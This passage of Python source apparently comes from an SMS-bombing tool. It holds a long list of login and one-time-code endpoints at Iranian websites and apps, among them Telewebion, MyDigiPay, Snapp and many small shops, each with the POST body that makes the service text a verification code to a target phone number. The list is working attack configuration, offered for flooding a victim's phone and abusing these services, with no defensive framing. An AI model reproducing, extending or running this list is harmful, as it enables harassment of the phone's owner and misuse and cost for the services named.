    {"name": "Fafait", "method": "POST", "url": "https://api2.fafait.net/oauth/check-user", "payload": {"id": phoneNumber_zero}},
    {"name": "Telewebion", "method": "POST", "url": "https://gateway.telewebion.com/shenaseh/api/v2/auth/step-one", "payload": {"code": "98", "phone": phoneNumber, "smsStatus": "default"}},
    {"name": "Caropex", "method": "POST", "url": "https://caropex.com/api/v1/user/login", "payload": {"mobile": phoneNumber_zero}},
    {"name": "NovinMedical", "method": "POST", "url": "https://novinmedical.com/wp-admin/admin-ajax.php", "data": {"action": "stm_login_register", "type": "mobile", "input": phoneNumber_zero}},
    {"name": "HamrahSport", "method": "POST", "url": "https://hamrahsport.com/send-otp", "data": {"cell": phoneNumber, "send_otp": "1"}},
    {"name": "Dalfak", "method": "POST", "url": "https://www.dalfak.com/api/auth/sendVerificationCode", "payload": {"type": 1, "value": phoneNumber_zero}},
    {"name": "MelliShoes", "method": "POST", "url": "https://mellishoes.ir/wp-admin/admin-ajax.php", "data": {"action": "websima_auth_account_detection", "mobile": phoneNumber_zero}},
    {"name": "SetShoe", "method": "POST", "url": "https://setshoe.ir/wp-admin/admin-ajax.php", "data": {"action": "stm_login_register", "type": "mobile", "input": phoneNumber_zero}},
    {"name": "MaxBax", "method": "POST", "url": "https://maxbax.com/wp-admin/admin-ajax.php", "data": {"action": "bakala_send_code", "phone_email": phoneNumber_zero}},
    {"name": "ParkBag", "method": "POST", "url": "https://parkbag.com/fa/Account/RegisterOrLoginByMobileNumber", "data": {"MobaileNumber": phoneNumber}},
    {"name": "TelKetab", "method": "POST", "url": "https://telketab.com/opt_field/check_secret", "data": {"identity": phoneNumber_zero}},
    {"name": "AdinehBook", "method": "POST", "url": "https://www.adinehbook.com/gp/flex/sign-in.html", "data": {"action": "sign", "phone_cell_or_email": phoneNumber_zero}},
    {"name": "GitaMehr", "method": "POST", "url": "https://gitamehr.ir/wp-admin/admin-ajax.php", "data": {"action": "stm_login_register", "type": "mobile", "input": phoneNumber_zero}},
    {"name": "SunnyBook", "method": "POST", "url": "https://sunnybook.ir/Home/RegisterUser", "data": {"mobile": phoneNumber}},
    {"name": "Mahouney", "method": "POST", "url": "https://mahouney.com/fa/Account/RegisterOrLoginByMobileNumber", "data": {"MobaileNumber": phoneNumber_zero}},
    {"name": "MyRoz", "method": "POST", "url": "https://myroz.ir/wp-admin/admin-ajax.php", "data": {"action": "stm_login_register", "type": "mobile", "input": phoneNumber_zero}},
    {"name": "Meidane", "method": "POST", "url": "https://meidane.com/accounts/login", "data": {"mobile": phoneNumber}},
    {"name": "iCkala", "method": "POST", "url": "https://ickala.com/", "data": {"controller": "SendSMS", "fc": "module", "module": "loginbymobile", "SubmitSmsSend": "1", "ajax": "true", "otp_mobile_num": phoneNumber_zero}},
    {"name": "ElecMarket", "method": "POST", "url": "https://elecmarket.ir/wp-admin/admin-ajax.php", "data": {"action": "stm_login_register", "type": "mobile", "input": phoneNumber_zero}},
    {"name": "TechSiro", "method": "POST", "url": "https://techsiro.com/send-otp", "payload": {"mobile": phoneNumber_zero}},
    {"name": "NovinParse", "method": "POST", "url": "https://novinparse.com/Page/PageAction.aspx", "data": {"Action": "SendVerifyCode", "mobile": phoneNumber_zero}},
    {"name": "TitoMarket", "method": "POST", "url": "https://titomarket.com/index.php?route=account/login_verify/verify", "data": {"telephone": phoneNumber_zero}},
    {"name": "NikanBike", "method": "POST", "url": "https://nikanbike.com/", "data": {"controller": "authentication", "fc": "module", "module": "iverify", "phone_mobile": phoneNumber_zero, "SubmitCheck": ""}},
    {"name": "Account724", "method": "POST", "url": "https://account724.com/wp-admin/admin-ajax.php", "data": {"action": "stm_login_register", "type": "mobile", "input": phoneNumber_zero}},
    {"name": "Eaccount", "method": "POST", "url": "https://eaccount.ir/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "QueenAccessories", "method": "POST", "url": "https://queenaccessories.ir/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "RastarAccessory", "method": "POST", "url": "https://rastaraccessory.ir/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "VinaAccessory", "method": "POST", "url": "https://vinaaccessory.com/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "ChortkehShop", "method": "POST", "url": "https://chortkehshop.ir/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "PiinkStore", "method": "POST", "url": "https://piinkstore.ir/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "DreamlandShop", "method": "POST", "url": "https://dreamlandshop.ir/api/v1/sessions/login_request", "payload": {"mobile_phone": phoneNumber_zero}},
    {"name": "MyDigiPay", "method": "POST", "url": "https://app.mydigipay.com/digipay/api/users/send-sms", "payload": {"cellNumber": phoneNumber_zero, "device": {"deviceId": "a16e6255-17c3-431b-b047-3f66d24c286f", "deviceModel": "WEB_BROWSER", "deviceAPI": "WEB_BROWSER", "osName": "WEB"}}},
    {"name": "FoodCenter", "method": "POST", "url": "https://www.foodcenter.ir/account/sabtmobile", "data": "mobile=" + phoneNumber_zero + ""},
    {"name": "MoboGift", "method": "POST", "url": "https://mobogift.com/signin", "payload": {"username": phoneNumber_zero}},
    {"name": "IranTic", "method": "POST", "url": "https://www.irantic.com/api/login/request", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Delino Restaurant", "method": "POST", "url": "https://restaurant.delino.com/user/register", "payload": {"username": phoneNumber_zero}},
    {"name": "Dadhesab", "method": "POST", "url": "https://api.dadhesab.ir/user/entry", "payload": {"username": phoneNumber_zero}},
    {"name": "RefahTea", "method": "POST", "url": "https://refahtea.ir/wp-admin/admin-ajax.php", "data": {"mobile": phoneNumber_zero}},
    {"name": "Snapp Digital", "method": "POST", "url": "https://digitalsignup.snapp.ir/oauth/drivers/api/v1/otp", "payload": {"cellphone": phoneNumber_zero}},
    {"name": "MamiFood", "method": "POST", "url": "https://mamifood.org/Registration.aspx/SendValidationCode", "payload": {"Phone": phoneNumber}},
    {"name": "WatchOnline", "method": "POST", "url": "https://api.watchonline.shop/api/v1/otp/request", "payload": {"mobile": phoneNumber_zero}},
    {"name": "Digify", "method": "POST", "url": "https://apollo.digify.shop/graphql", "payload": {"operationName": "Mutation", "variables": {"content": {"phone_number": phoneNumber_zero}}, "query": "mutation Mutation($content: MerchantRegisterOTPSendContent) { merchantRegister { otpSend(content: $content) __typename } }"}},
]

API_VERSION = "2.1.0"
API_LIST_COUNT = len(API_LIST("+9891234567890"))